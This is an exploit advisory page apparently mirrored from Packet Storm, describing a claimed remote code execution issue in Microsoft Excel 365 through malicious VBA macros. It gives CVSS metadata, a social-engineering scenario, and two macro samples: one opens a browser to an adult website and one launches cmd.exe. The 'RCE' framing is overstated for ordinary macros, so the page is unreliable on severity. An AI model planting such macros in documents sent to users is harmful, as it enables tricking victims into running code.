Lucene search

K
packetstormNu11secur1tyPACKETSTORM:171767
HistoryApr 10, 2023 - 12:00 a.m.

Microsoft Excel 365 MSO 2302 Build 16.0.16130.20186 Remote Code Execution

2023-04-1000:00:00
nu11secur1ty
packetstormsecurity.com
121

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

`## Title: Microsoft Excel RCE Vulnerability / Microsoftยฎ365 MSO  
(Version 2302 Build 16.0.16130.20186) 64-bit  
## Author: nu11secur1ty  
## Date: 03.16.2023  
## Vendor: https://www.microsoft.com/en-us/microsoft-365/excel  
## Software: https://www.microsoft.com/en-us/microsoft-365/excel  
## Reference: https://www.invicti.com/learn/remote-code-execution-rce/  
  
## Description:  
The malicious user can exploit the victim's PC remotely.  
For example, when the score indicates that the Attack Vector is Local  
and User Interaction is Required, this could describe an exploit in  
which an attacker, through social engineering, convinces a victim to  
download and open a specially crafted file from a website which leads  
to a local attack on their computer.  
In this case, the malicious `excel` file create a very dangerous shell  
execution file, and after the victim will execute it, his PC maybe  
will never wake up normally, it depends on the case, which is very  
nasty.  
  
STATUS: HIGH Vulnerability  
  
[+]Exploit0:  
```  
Sub Check_your_salaries()  
CreateObject("Shell.Application").ShellExecute  
"microsoft-edge:https://pornhub.com"  
End Sub  
```  
[+]Exploit1:  
```  
Sub cmd()  
Dim Program As String  
Dim TaskID As Double  
On Error Resume Next  
Program = "cmd.exe"  
TaskID = Shell(Program, 1)  
If Err <> 0 Then  
MsgBox "Can't start " & Program  
End If  
End Sub  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-23399)  
  
## Proof and Exploit:  
[href](https://streamable.com/dnyfx0)  
  
## Time spend:  
03:00:00  
  
  
`

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H